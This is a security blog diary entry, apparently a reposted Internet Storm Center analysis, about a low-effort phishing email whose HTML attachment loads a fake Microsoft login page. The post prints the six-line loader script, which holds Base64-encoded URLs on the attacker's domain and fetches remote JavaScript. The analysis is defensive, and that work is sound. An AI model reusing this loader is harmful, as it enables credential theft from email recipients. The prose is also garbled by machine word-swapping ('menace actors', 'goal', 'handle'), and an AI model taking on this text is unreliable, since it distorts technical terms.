Web Storm Heart Diary 2023-08-31
These of us who educate safety consciousness programs are sometimes requested “Why would somebody goal ME?” or “Why would somebody goal OUR group?”. Although these sentiments aren’t practically as frequent as they was, since even mainstream media appear to cowl cyber-attacks on at the very least a weekly foundation, and – consequently – even non-IT specialists have gotten conscious of the ubiquity of cyber-attacks, such questions nonetheless come up, each when instructing “common” staff in addition to in the case of board-level safety trainings.
To my thoughts, the outdated proverb “alternative makes the thief” describes the primary situation with cybercrime fairly properly – the web is a really “target-rich” surroundings, and it’s extremely straightforward/low cost to create a easy piece of malicious code or launch a primary assault. The aforementioned low prices imply that in the case of generic assaults, menace actors don’t discriminate, they usually goal just about everybody, and nothing demonstrates this higher that generic, “un-targeted” phishing e-mails.
It’s, in fact, true, that the majority generic phishing messages will likely be – both instantly or very quickly after they’re delivered to their first recipients – detected and blocked by any safety answer well worth the title, nonetheless, if even one in a thousand or ten thousand e-mails results in a recipient downloading a malicious file or typing legitimate credentials right into a phishing web site, sending such messages out continues to be a worthwhile endeavor from the menace actors perspective. The truth that their creations are quickly being blocked will not be essentially important since the price of modifying a phishing message or its attachment or creating a brand new one is sort of low.
Few weeks in the past, I got here throughout phishing message, which appeared to me to be a literal manifestation of this “low cost and easy” method.
The e-mail in query was despatched with a spoofed sender handle in its header, making it appear like it got here from the recipient himself. Although this meant that it might be blocked/quarantined if DMARC was correctly arrange for the area of the recipient, it additionally meant that if DMARC (or different related filtering mechanism) wasn’t in place and the e-mail made it to the recipient’s inbox, Outlook (and different shoppers doubtlessly too) would possibly “helpfully” show a photograph of the recipient as a sender, ought to the photograph be obtainable as a part of the contact info, thus making the e-mail look extra reliable.
As you may even see, the message topic talked about a acquired voice name and the physique of the e-mail was left utterly empty – to date (apart from the spoofed sender handle), it was as primary as a malicious e-mail might be. However what made the “easy and low cost” theme full was the HTML attachment, which solely contained the next 6 traces.
<script>
var iam = "[name]@[domain].com";
var gate = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vZW5lcmFsLnBocA==";
var crea8 = "aHR0cHM6Ly9kb25ld2VsbGJ5d2VsbC5jb20vcGFnZS5qcw==";
doc.write('<script src="'+atob(crea8)+'"></script>');
</script>
The gate variable contained the Base64-encoded URL hxxps[://]donewellbywell[.]com/eneral[.]php and the crea8 variable contained encoded URL hxxps[://]donewellbywell[.]com/web page[.]js. The area talked about within the two URLs was registered solely two days earlier than the e-mail was despatched[1], which appears to point that it was supposed to be a disposable area used (primarily) on this marketing campaign… Which agrees properly with the “it’s low cost to do cybercrime” theme.
It in all probability gained’t come as a shock to you that the JavaScript loaded from the exterior URL was imagined to show a faux Microsoft login immediate.
Although the JavaScript loaded from the exterior area was not so simple as the remainder of the assault (it was closely obfuscated and “weight in” at 155 kB) and it would subsequently seem to be it went towards the “low cost and easy” method, the truth that it was hosted externally allowed for it to be reused between campaigns… Which is what the menace actors did – VirusTotal, one can see that the identical JavaScript file has been in use since at the very least Might of this 12 months[2]. Subsequently, even when improvement of the file (or its buy) might need been considerably extra expensive than the remainder of the assault, by means of reuse, it might pay for itself in the long run…
As we are able to see from this small instance, in 2023, it nonetheless is sensible for the menace actors to ship out an clearly suspicious 6-line HTML file in an empty e-mail with a spoofed sender handle… Proving that the price of committing cybercrime may be actually low.
[1] https://whois.domaintools.com/donewellbywell.com[2] https://www.virustotal.com/gui/file/a7e17ecb0fa26f589bad906ed411af2142fbf9668841f7af613fcb861a672961/relations
———–
Jan Kopriva
@jk0pr
Nettles Consulting